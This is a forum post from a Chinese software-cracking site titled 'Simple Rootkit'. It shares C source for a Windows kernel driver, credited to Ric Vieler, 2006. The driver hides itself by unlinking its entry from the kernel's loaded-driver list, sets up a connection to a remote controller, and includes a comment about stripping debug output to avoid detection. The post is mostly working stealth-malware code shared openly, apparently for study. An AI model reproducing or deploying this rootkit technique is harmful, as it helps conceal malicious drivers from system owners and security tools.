设为首页收藏本站官方微博
开启辅助访问 切换到窄版

飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

[x86]PYG官方Dll优雅破解补丁制作工具[x64]PYG官方DLL优雅破解补丁制作工具[x86]PYG官方Exe优雅破解补丁制作工具[x86/x64]Baymax Patch Tools飘云阁工具包(已更新第4季)
返回列表 发新帖
查看: 2121|回复: 0

简单的Rootkit

  [复制链接]
whypro
  • TA的每日心情
    慵懒
    2019-3-12 17:25

    • 签到天数: 3 天

    [LV.2]偶尔看看I
    发表于 2010-9-23 19:34:52 | 显示全部楼层 |阅读模式
    本帖最后由 whypro 于 2010-9-23 19:38 编辑

    就删除了LIST_ENTRY链表上源码:
    Ghost.h
    // Copyright Ric Vieler, 2006
    // Support header for Ghost.c

    #ifndef _GHOST_H_
    #define _GHOST_H_

    typedef BOOLEAN BOOL;
    typedef unsigned long DWORD;
    typedef DWORD* PDWORD;
    typedef unsigned long ULONG;
    typedef unsigned short WORD;
    typedef unsigned char BYTE;

    typedef struct _DRIVER_DATA
    {
    LIST_ENTRY listEntry;
    DWORD  unknown1;
    DWORD  unknown2;
    DWORD  unknown3;
    DWORD  unknown4;
    DWORD  unknown5;
    DWORD  unknown6;
    DWORD  unknown7;
    UNICODE_STRING path;
    UNICODE_STRING name;
    } DRIVER_DATA;

    #endif

    Ghost.c
    // Ghost
    // Copyright Ric Vieler, 2006

    #include "ntddk.h"
    #include "Ghost.h"
    #include "fileManager.h"
    #include "configManager.h"

    // Global version data
    ULONG majorVersion;
    ULONG minorVersion;

    // Comment out in free build to avoid detection
    VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
    {
    DbgPrint("comint32: OnUnload called.");
    }


    NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING
    theRegistryPath )
    {
    DRIVER_DATA* driverData;

    // Get the operating system version
    PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

    // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
    // Major = 5: Windows Server 2003, Windows XP or Windows 2000
    // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
    // Minor = 1: Windows XP
    // Minor = 2: Windows Server 2003

    if ( majorVersion == 5 && minorVersion == 2 )
    {

      DbgPrint("comint32: Running on Windows 2003");
    }
    else if ( majorVersion == 5 && minorVersion == 1 )
    {

      DbgPrint("comint32: Running on Windows XP");
    }
    else if ( majorVersion == 5 && minorVersion == 0 )
    {
      DbgPrint("comint32: Running on Windows 2000");
    }
    else if ( majorVersion == 4 && minorVersion == 0 )
    {

      DbgPrint("comint32: Running on Windows NT 4.0");
    }
    else
    {

      DbgPrint("comint32: Running on unknown system");
    }

    // Hide this driver
    driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
    if( driverData != NULL )
    {
      // unlink this driver entry from the driver list
      *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
      driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
    }

    // Allow the driver to be unloaded

    pDriverObject->DriverUnload = OnUnload;

    // Configure the controller connection
    if( !NT_SUCCESS( Configure() ) )
    {
      DbgPrint("comint32: Could not configure remote connection.\n");
      return STATUS_UNSUCCESSFUL;
    }

    return STATUS_SUCCESS;
    }

    此图为证
    Snap2.gif
    rootkit

    相关帖子

    PYG19周年生日快乐!
    回复

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表